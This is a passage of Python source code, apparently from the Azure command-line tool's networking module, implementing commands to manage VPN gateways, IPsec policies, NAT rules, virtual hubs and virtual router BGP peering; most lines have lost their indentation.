if any((radius_secret, radius_server)) and cmd.supported_api_version(min_api='2017-06-01'):
vnet_gateway.vpn_client_configuration.radius_server_address = radius_server
vnet_gateway.vpn_client_configuration.radius_server_secret = radius_secret
        # multiple authentication types
if cmd.supported_api_version(min_api='2020-11-01'):
vnet_gateway.vpn_client_configuration.vpn_authentication_types = vpn_auth_type
vnet_gateway.vpn_client_configuration.aad_tenant = aad_tenant
vnet_gateway.vpn_client_configuration.aad_issuer = aad_issuer
vnet_gateway.vpn_client_configuration.aad_audience = aad_audience
vnet_gateway.vpn_client_configuration.vpn_client_root_certificates = [
VpnClientRootCertificate(name=root_cert_name,
public_cert_data=root_cert_data)] if root_cert_data else None
if custom_routes and cmd.supported_api_version(min_api='2019-02-01'):
vnet_gateway.custom_routes = AddressSpace()
vnet_gateway.custom_routes.address_prefixes = custom_routes
if edge_zone:
vnet_gateway.extended_location = _edge_zone_model(cmd, edge_zone)
if nat_rule:
vnet_gateway.nat_rules = [
VirtualNetworkGatewayNatRule(type_properties_type=rule.get('type'), mode=rule.get('mode'), name=rule.get('name'),
internal_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in rule.get('internal_mappings')] if rule.get('internal_mappings') else None,
external_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in rule.get('external_mappings')] if rule.get('external_mappings') else None,
ip_configuration_id=rule.get('ip_config_id')) for rule in nat_rule]
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, virtual_network_gateway_name, vnet_gateway)
def update_vnet_gateway(cmd, instance, sku=None, vpn_type=None, tags=None,
public_ip_address=None, gateway_type=None, enable_bgp=None,
asn=None, bgp_peering_address=None, peer_weight=None, virtual_network=None,
address_prefixes=None, radius_server=None, radius_secret=None, client_protocol=None,
gateway_default_site=None, custom_routes=None, aad_tenant=None, aad_audience=None,
aad_issuer=None, root_cert_data=None, root_cert_name=None, vpn_auth_type=None):
(AddressSpace, SubResource, VirtualNetworkGatewayIPConfiguration, VpnClientConfiguration,
VpnClientRootCertificate) = cmd.get_models('AddressSpace', 'SubResource', 'VirtualNetworkGatewayIPConfiguration',
'VpnClientConfiguration', 'VpnClientRootCertificate')
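    # Create the point-to-site client configuration lazily, only when a P2S-related option is supplied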
if any((address_prefixes, radius_server, radius_secret, client_protocol)) and not instance.vpn_client_configuration:
instance.vpn_client_configuration = VpnClientConfiguration()
if address_prefixes is not None:
if not instance.vpn_client_configuration.vpn_client_address_pool:
instance.vpn_client_configuration.vpn_client_address_pool = AddressSpace()
if not instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes:
instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes = []
instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes = address_prefixes
with cmd.update_context(instance.vpn_client_configuration) as c:
c.set_param('vpn_client_protocols', client_protocol)
c.set_param('radius_server_address', radius_server)
c.set_param('radius_server_secret', radius_secret)
if cmd.supported_api_version(min_api='2020-11-01'):
c.set_param('aad_tenant', aad_tenant)
c.set_param('aad_audience', aad_audience)
c.set_param('aad_issuer', aad_issuer)
c.set_param('vpn_authentication_types', vpn_auth_type)
if root_cert_data and cmd.supported_api_version(min_api='2020-11-01'):
upsert_to_collection(instance.vpn_client_configuration, 'vpn_client_root_certificates',
VpnClientRootCertificate(name=root_cert_name, public_cert_data=root_cert_data), 'name')
with cmd.update_context(instance.sku) as c:
c.set_param('name', sku)
c.set_param('tier', sku)
with cmd.update_context(instance) as c:
c.set_param('gateway_default_site', SubResource(id=gateway_default_site) if gateway_default_site else None)
c.set_param('vpn_type', vpn_type)
c.set_param('tags', tags)
subnet_id = '{}/subnets/GatewaySubnet'.format(virtual_network) if virtual_network else \
instance.ip_configurations[0].subnet.id
if virtual_network is not None:
for config in instance.ip_configurations:
config.subnet.id = subnet_id
if public_ip_address is not None:
instance.ip_configurations = []
for i, public_ip in enumerate(public_ip_address):
ip_configuration = VirtualNetworkGatewayIPConfiguration(
subnet=SubResource(id=subnet_id),
public_ip_address=SubResource(id=public_ip),
private_ip_allocation_method='Dynamic', name='vnetGatewayConfig{}'.format(i))
instance.ip_configurations.append(ip_configuration)
# Update active-active/active-standby status
active = len(public_ip_address) == 2
if instance.active and not active:
logger.info('Placing gateway in active-standby mode.')
elif not instance.active and active:
logger.info('Placing gateway in active-active mode.')
instance.active = active
if gateway_type is not None:
instance.gateway_type = gateway_type
if enable_bgp is not None:
instance.enable_bgp = enable_bgp.lower() == 'true'
if custom_routes and cmd.supported_api_version(min_api='2019-02-01'):
if not instance.custom_routes:
instance.custom_routes = AddressSpace()
instance.custom_routes.address_prefixes = custom_routes
_validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight)
return instance
def start_vnet_gateway_package_capture(cmd, client, resource_group_name, virtual_network_gateway_name,
filter_data=None, no_wait=False):
VpnPacketCaptureStartParameters = cmd.get_models('VpnPacketCaptureStartParameters')
parameters = VpnPacketCaptureStartParameters(filter_data=filter_data)
return sdk_no_wait(no_wait, client.begin_start_packet_capture, resource_group_name,
virtual_network_gateway_name, parameters=parameters)
def stop_vnet_gateway_package_capture(cmd, client, resource_group_name, virtual_network_gateway_name,
sas_url, no_wait=False):
VpnPacketCaptureStopParameters = cmd.get_models('VpnPacketCaptureStopParameters')
parameters = VpnPacketCaptureStopParameters(sas_url=sas_url)
return sdk_no_wait(no_wait, client.begin_stop_packet_capture, resource_group_name,
virtual_network_gateway_name, parameters=parameters)
def generate_vpn_client(cmd, client, resource_group_name, virtual_network_gateway_name, processor_architecture=None,
authentication_method=None, radius_server_auth_certificate=None, client_root_certificates=None,
use_legacy=False):
params = cmd.get_models('VpnClientParameters')(
processor_architecture=processor_architecture
)
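    # On 2017-06-01+ API versions the newer VPN profile endpoint is used unless use_legacy is set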
if cmd.supported_api_version(min_api='2017-06-01') and not use_legacy:
params.authentication_method = authentication_method
params.radius_server_auth_certificate = radius_server_auth_certificate
params.client_root_certificates = client_root_certificates
return client.begin_generate_vpn_profile(resource_group_name, virtual_network_gateway_name, params)
# legacy implementation
return client.begin_generatevpnclientpackage(resource_group_name, virtual_network_gateway_name, params)
def set_vpn_client_ipsec_policy(cmd, client, resource_group_name, virtual_network_gateway_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
VpnClientIPsecParameters = cmd.get_models('VpnClientIPsecParameters')
vpnclient_ipsec_params = VpnClientIPsecParameters(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
return sdk_no_wait(no_wait, client.begin_set_vpnclient_ipsec_parameters, resource_group_name,
virtual_network_gateway_name, vpnclient_ipsec_params)
def disconnect_vnet_gateway_vpn_connections(cmd, client, resource_group_name, virtual_network_gateway_name,
vpn_connection_ids, no_wait=False):
P2SVpnConnectionRequest = cmd.get_models('P2SVpnConnectionRequest')
request = P2SVpnConnectionRequest(vpn_connection_ids=vpn_connection_ids)
return sdk_no_wait(no_wait, client.begin_disconnect_virtual_network_gateway_vpn_connections,
resource_group_name, virtual_network_gateway_name, request)
# endregion
# region VirtualNetworkGatewayConnections
# pylint: disable=too-many-locals
def create_vpn_connection(cmd, resource_group_name, connection_name, vnet_gateway1,
location=None, tags=None, no_wait=False, validate=False,
vnet_gateway2=None, express_route_circuit2=None, local_gateway2=None,
authorization_key=None, enable_bgp=False, routing_weight=10,
connection_type=None, shared_key=None,
use_policy_based_traffic_selectors=False,
express_route_gateway_bypass=None, ingress_nat_rule=None, egress_nat_rule=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import build_vpn_connection_resource
client = network_client_factory(cmd.cli_ctx).virtual_network_gateway_connections
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
tags = tags or {}
# Build up the ARM template
master_template = ArmTemplateBuilder()
vpn_connection_resource = build_vpn_connection_resource(
cmd, connection_name, location, tags, vnet_gateway1,
vnet_gateway2 or local_gateway2 or express_route_circuit2,
connection_type, authorization_key, enable_bgp, routing_weight, shared_key,
use_policy_based_traffic_selectors, express_route_gateway_bypass, ingress_nat_rule, egress_nat_rule)
master_template.add_resource(vpn_connection_resource)
master_template.add_output('resource', connection_name, output_type='object')
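    # Pass the shared key and authorization key as secure ARM template parameters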
if shared_key:
master_template.add_secure_parameter('sharedKey', shared_key)
if authorization_key:
master_template.add_secure_parameter('authorizationKey', authorization_key)
template = master_template.build()
parameters = master_template.build_parameters()
# deploy ARM template
deployment_name = 'vpn_connection_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
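    # With validate, only validate the generated template; otherwise submit the deployment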
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def update_vpn_connection(cmd, instance, routing_weight=None, shared_key=None, tags=None,
enable_bgp=None, use_policy_based_traffic_selectors=None,
express_route_gateway_bypass=None):
with cmd.update_context(instance) as c:
c.set_param('routing_weight', routing_weight)
c.set_param('shared_key', shared_key)
c.set_param('tags', tags)
c.set_param('enable_bgp', enable_bgp)
c.set_param('express_route_gateway_bypass', express_route_gateway_bypass)
c.set_param('use_policy_based_traffic_selectors', use_policy_based_traffic_selectors)
# TODO: Remove these when issue #1615 is fixed
gateway1_id = parse_resource_id(instance.virtual_network_gateway1.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway1_id['subscription'])
instance.virtual_network_gateway1 = ncf.virtual_network_gateways.get(
gateway1_id['resource_group'], gateway1_id['name'])
if instance.virtual_network_gateway2:
gateway2_id = parse_resource_id(instance.virtual_network_gateway2.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway2_id['subscription'])
instance.virtual_network_gateway2 = ncf.virtual_network_gateways.get(
gateway2_id['resource_group'], gateway2_id['name'])
if instance.local_network_gateway2:
gateway2_id = parse_resource_id(instance.local_network_gateway2.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway2_id['subscription'])
instance.local_network_gateway2 = ncf.local_network_gateways.get(
gateway2_id['resource_group'], gateway2_id['name'])
return instance
def list_vpn_connections(cmd, resource_group_name, virtual_network_gateway_name=None):
if virtual_network_gateway_name:
client = network_client_factory(cmd.cli_ctx).virtual_network_gateways
return client.list_connections(resource_group_name, virtual_network_gateway_name)
client = network_client_factory(cmd.cli_ctx).virtual_network_gateway_connections
return client.list(resource_group_name)
def start_vpn_conn_package_capture(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
filter_data=None, no_wait=False):
VpnPacketCaptureStartParameters = cmd.get_models('VpnPacketCaptureStartParameters')
parameters = VpnPacketCaptureStartParameters(filter_data=filter_data)
return sdk_no_wait(no_wait, client.begin_start_packet_capture, resource_group_name,
virtual_network_gateway_connection_name, parameters=parameters)
def stop_vpn_conn_package_capture(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
sas_url, no_wait=False):
VpnPacketCaptureStopParameters = cmd.get_models('VpnPacketCaptureStopParameters')
parameters = VpnPacketCaptureStopParameters(sas_url=sas_url)
return sdk_no_wait(no_wait, client.begin_stop_packet_capture, resource_group_name,
virtual_network_gateway_connection_name, parameters=parameters)
def show_vpn_connection_device_config_script(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
vendor, device_family, firmware_version):
VpnDeviceScriptParameters = cmd.get_models('VpnDeviceScriptParameters')
parameters = VpnDeviceScriptParameters(
vendor=vendor,
device_family=device_family,
firmware_version=firmware_version
)
return client.vpn_device_configuration_script(resource_group_name, virtual_network_gateway_connection_name,
parameters=parameters)
# endregion
# region IPSec Policy Commands
def add_vnet_gateway_ipsec_policy(cmd, resource_group_name, gateway_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
IpsecPolicy = cmd.get_models('IpsecPolicy')
new_policy = IpsecPolicy(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
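    # vpn_client_configuration is None until point-to-site is configured; the AttributeError guard below surfaces a friendly error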
try:
if gateway.vpn_client_configuration.vpn_client_ipsec_policies:
gateway.vpn_client_configuration.vpn_client_ipsec_policies.append(new_policy)
else:
gateway.vpn_client_configuration.vpn_client_ipsec_policies = [new_policy]
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def clear_vnet_gateway_ipsec_policies(cmd, resource_group_name, gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
try:
gateway.vpn_client_configuration.vpn_client_ipsec_policies = None
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
from azure.cli.core.commands import LongRunningOperation
poller = sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
return LongRunningOperation(cmd.cli_ctx)(poller).vpn_client_configuration.vpn_client_ipsec_policies
def list_vnet_gateway_ipsec_policies(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
try:
return ncf.get(resource_group_name, gateway_name).vpn_client_configuration.vpn_client_ipsec_policies
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
def add_vpn_conn_ipsec_policy(cmd, client, resource_group_name, connection_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
IpsecPolicy = cmd.get_models('IpsecPolicy')
new_policy = IpsecPolicy(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
conn = client.get(resource_group_name, connection_name)
if conn.ipsec_policies:
conn.ipsec_policies.append(new_policy)
else:
conn.ipsec_policies = [new_policy]
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
def clear_vpn_conn_ipsec_policies(cmd, client, resource_group_name, connection_name, no_wait=False):
conn = client.get(resource_group_name, connection_name)
conn.ipsec_policies = None
conn.use_policy_based_traffic_selectors = False
if no_wait:
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
from azure.cli.core.commands import LongRunningOperation
poller = sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
return LongRunningOperation(cmd.cli_ctx)(poller).ipsec_policies
def list_vpn_conn_ipsec_policies(cmd, client, resource_group_name, connection_name):
return client.get(resource_group_name, connection_name).ipsec_policies
def assign_vnet_gateway_aad(cmd, resource_group_name, gateway_name,
aad_tenant, aad_audience, aad_issuer, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
gateway.vpn_client_configuration.aad_tenant = aad_tenant
gateway.vpn_client_configuration.aad_audience = aad_audience
gateway.vpn_client_configuration.aad_issuer = aad_issuer
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def show_vnet_gateway_aad(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
return gateway.vpn_client_configuration
def remove_vnet_gateway_aad(cmd, resource_group_name, gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
gateway.vpn_client_configuration.aad_tenant = None
gateway.vpn_client_configuration.aad_audience = None
gateway.vpn_client_configuration.aad_issuer = None
if cmd.supported_api_version(min_api='2020-11-01'):
gateway.vpn_client_configuration.vpn_authentication_types = None
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def add_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name, name, internal_mappings, external_mappings,
rule_type=None, mode=None, ip_config_id=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
VirtualNetworkGatewayNatRule, VpnNatRuleMapping = cmd.get_models('VirtualNetworkGatewayNatRule',
'VpnNatRuleMapping')
gateway.nat_rules.append(
VirtualNetworkGatewayNatRule(type_properties_type=rule_type, mode=mode, name=name,
internal_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in internal_mappings] if internal_mappings else None,
external_mappings=[VpnNatRuleMapping(address_space=e_map) for e_map in external_mappings] if external_mappings else None,
ip_configuration_id=ip_config_id))
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def show_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
return gateway.nat_rules
def remove_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name, name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
for rule in gateway.nat_rules:
if name == rule.name:
gateway.nat_rules.remove(rule)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
    raise UnrecognizedArgumentError(f'NAT rule named "{name}" was not found.')
# endregion
# region VirtualHub
def create_virtual_hub(cmd, client,
resource_group_name,
virtual_hub_name,
hosted_subnet,
public_ip_address=None,
location=None,
tags=None):
from azure.core.exceptions import HttpResponseError
from azure.cli.core.commands import LongRunningOperation
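    # Fail fast if a virtual hub with this name already exists in the resource group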
try:
client.get(resource_group_name, virtual_hub_name)
        raise CLIError('The VirtualHub "{}" under resource group "{}" already exists'.format(
            virtual_hub_name, resource_group_name))
except HttpResponseError:
pass
SubResource = cmd.get_models('SubResource')
VirtualHub, HubIpConfiguration = cmd.get_models('VirtualHub', 'HubIpConfiguration')
hub = VirtualHub(tags=tags, location=location,
virtual_wan=None,
sku='Standard')
vhub_poller = client.begin_create_or_update(resource_group_name, virtual_hub_name, hub)
LongRunningOperation(cmd.cli_ctx)(vhub_poller)
ip_config = HubIpConfiguration(
subnet=SubResource(id=hosted_subnet),
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
)
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
try:
vhub_ip_poller = vhub_ip_config_client.begin_create_or_update(
resource_group_name, virtual_hub_name, 'Default', ip_config)
LongRunningOperation(cmd.cli_ctx)(vhub_ip_poller)
except Exception as ex:
logger.error(ex)
try:
vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
except HttpResponseError:
pass
client.begin_delete(resource_group_name, virtual_hub_name)
raise ex
return client.get(resource_group_name, virtual_hub_name)
def virtual_hub_update_setter(client, resource_group_name, virtual_hub_name, parameters):
return client.begin_create_or_update(resource_group_name, virtual_hub_name, parameters)
def update_virtual_hub(cmd, instance,
tags=None,
allow_branch_to_branch_traffic=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
c.set_param('allow_branch_to_branch_traffic', allow_branch_to_branch_traffic)
return instance
def delete_virtual_hub(cmd, client, resource_group_name, virtual_hub_name, no_wait=False):
from azure.cli.core.commands import LongRunningOperation
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
ip_configs = list(vhub_ip_config_client.list(resource_group_name, virtual_hub_name))
if ip_configs:
ip_config = ip_configs[0] # There will always be only 1
poller = vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, ip_config.name)
LongRunningOperation(cmd.cli_ctx)(poller)
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, virtual_hub_name)
def list_virtual_hub(client, resource_group_name=None):
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name)
return client.list()
def create_virtual_hub_bgp_connection(cmd, client, resource_group_name, virtual_hub_name, connection_name,
peer_asn, peer_ip, no_wait=False):
BgpConnection = cmd.get_models('BgpConnection')
vhub_bgp_conn = BgpConnection(name=connection_name, peer_asn=peer_asn, peer_ip=peer_ip)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name,
virtual_hub_name, connection_name, vhub_bgp_conn)
def virtual_hub_bgp_connection_update_setter(client, resource_group_name,
virtual_hub_name, connection_name,
parameters):
return client.begin_create_or_update(resource_group_name, virtual_hub_name, connection_name, parameters)
def update_virtual_hub_bgp_connection(cmd, instance, peer_asn=None, peer_ip=None):
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('peer_ip', peer_ip)
return instance
def delete_virtual_hub_bgp_connection(client, resource_group_name,
virtual_hub_name, connection_name, no_wait=False):
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, virtual_hub_name, connection_name)
def list_virtual_hub_bgp_connection_learned_routes(client, resource_group_name, virtual_hub_name, connection_name):
return client.begin_list_learned_routes(resource_group_name, virtual_hub_name, connection_name)
def list_virtual_hub_bgp_connection_advertised_routes(client, resource_group_name, virtual_hub_name, connection_name):
return client.begin_list_advertised_routes(resource_group_name, virtual_hub_name, connection_name)
# endregion
# region VirtualRouter
def create_virtual_router(cmd,
resource_group_name,
virtual_router_name,
hosted_gateway=None,
hosted_subnet=None,
location=None,
tags=None):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
from azure.core.exceptions import HttpResponseError
try:
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
virtual_hub_name = virtual_router_name
try:
vhub_client.get(resource_group_name, virtual_hub_name)
        raise CLIError('The VirtualRouter "{}" under resource group "{}" already exists'.format(
            virtual_hub_name, resource_group_name))
except HttpResponseError:
pass
SubResource = cmd.get_models('SubResource')
# for old VirtualRouter
if hosted_gateway is not None:
VirtualRouter = cmd.get_models('VirtualRouter')
virtual_router = VirtualRouter(virtual_router_asn=None,
virtual_router_ips=[],
hosted_subnet=None,
hosted_gateway=SubResource(id=hosted_gateway),
location=location,
tags=tags)
return vrouter_client.begin_create_or_update(resource_group_name, virtual_router_name, virtual_router)
# for VirtualHub
VirtualHub, HubIpConfiguration = cmd.get_models('VirtualHub', 'HubIpConfiguration')
hub = VirtualHub(tags=tags, location=location, virtual_wan=None, sku='Standard')
ip_config = HubIpConfiguration(subnet=SubResource(id=hosted_subnet))
from azure.cli.core.commands import LongRunningOperation
vhub_poller = vhub_client.begin_create_or_update(resource_group_name, virtual_hub_name, hub)
LongRunningOperation(cmd.cli_ctx)(vhub_poller)
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
try:
vhub_ip_poller = vhub_ip_config_client.begin_create_or_update(resource_group_name,
virtual_hub_name,
'Default',
ip_config)
LongRunningOperation(cmd.cli_ctx)(vhub_ip_poller)
except Exception as ex:
logger.error(ex)
vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
vhub_client.begin_delete(resource_group_name, virtual_hub_name)
raise ex
return vhub_client.get(resource_group_name, virtual_hub_name)
def virtual_router_update_getter(cmd, resource_group_name, virtual_router_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
return vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError: # 404
pass
virtual_hub_name = virtual_router_name
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
return vhub_client.get(resource_group_name, virtual_hub_name)
def virtual_router_update_setter(cmd, resource_group_name, virtual_router_name, parameters):
if parameters.type == 'Microsoft.Network/virtualHubs':
client = network_client_factory(cmd.cli_ctx).virtual_hubs
else:
client = network_client_factory(cmd.cli_ctx).virtual_routers
# If the client is virtual_hubs,
# the virtual_router_name represents virtual_hub_name and
# the parameters represents VirtualHub
return client.begin_create_or_update(resource_group_name, virtual_router_name, parameters)
def update_virtual_router(cmd, instance, tags=None):
# both VirtualHub and VirtualRouter own those properties
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
return instance
def list_virtual_router(cmd, resource_group_name=None):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
if resource_group_name is not None:
vrouters = vrouter_client.list_by_resource_group(resource_group_name)
vhubs = vhub_client.list_by_resource_group(resource_group_name)
else:
vrouters = vrouter_client.list()
vhubs = vhub_client.list()
return list(vrouters) + list(vhubs)
def show_virtual_router(cmd, resource_group_name, virtual_router_name):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
from azure.core.exceptions import HttpResponseError
try:
item = vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
virtual_hub_name = virtual_router_name
item = vhub_client.get(resource_group_name, virtual_hub_name)
return item
def delete_virtual_router(cmd, resource_group_name, virtual_router_name):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
from azure.core.exceptions import HttpResponseError
try:
vrouter_client.get(resource_group_name, virtual_router_name)
item = vrouter_client.begin_delete(resource_group_name, virtual_router_name)
except HttpResponseError:
from azure.cli.core.commands import LongRunningOperation
virtual_hub_name = virtual_router_name
poller = vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
LongRunningOperation(cmd.cli_ctx)(poller)
item = vhub_client.begin_delete(resource_group_name, virtual_hub_name)
return item
def create_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name, peer_asn, peer_ip):
# try VirtualRouter first
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
VirtualRouterPeering = cmd.get_models('VirtualRouterPeering')
virtual_router_peering = VirtualRouterPeering(peer_asn=peer_asn, peer_ip=peer_ip)
return vrouter_peering_client.begin_create_or_update(resource_group_name,
virtual_router_name,
peering_name,
virtual_router_peering)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
    # if the virtual router doesn't exist, fall back to VirtualHub
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
BgpConnection = cmd.get_models('BgpConnection')
vhub_bgp_conn = BgpConnection(name=peering_name, peer_asn=peer_asn, peer_ip=peer_ip)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.begin_create_or_update(resource_group_name, virtual_hub_name,
bgp_conn_name, vhub_bgp_conn)
def virtual_router_peering_update_getter(cmd, resource_group_name, virtual_router_name, peering_name):
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
from azure.core.exceptions import HttpResponseError
try:
return vrouter_peering_client.get(resource_group_name, virtual_router_name, peering_name)
except HttpResponseError: # 404
pass
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.get(resource_group_name, virtual_hub_name, bgp_conn_name)
def virtual_router_peering_update_setter(cmd, resource_group_name, virtual_router_name, peering_name, parameters):
if parameters.type == 'Microsoft.Network/virtualHubs/bgpConnections':
client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
else:
client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
# if the client is virtual_hub_bgp_connection,
# the virtual_router_name represents virtual_hub_name and
# the peering_name represents bgp_connection_name and
# the parameters represents BgpConnection
return client.begin_create_or_update(resource_group_name, virtual_router_name, peering_name, parameters)
def update_virtual_router_peering(cmd, instance, peer_asn=None, peer_ip=None):
# both VirtualHub and VirtualRouter own those properties
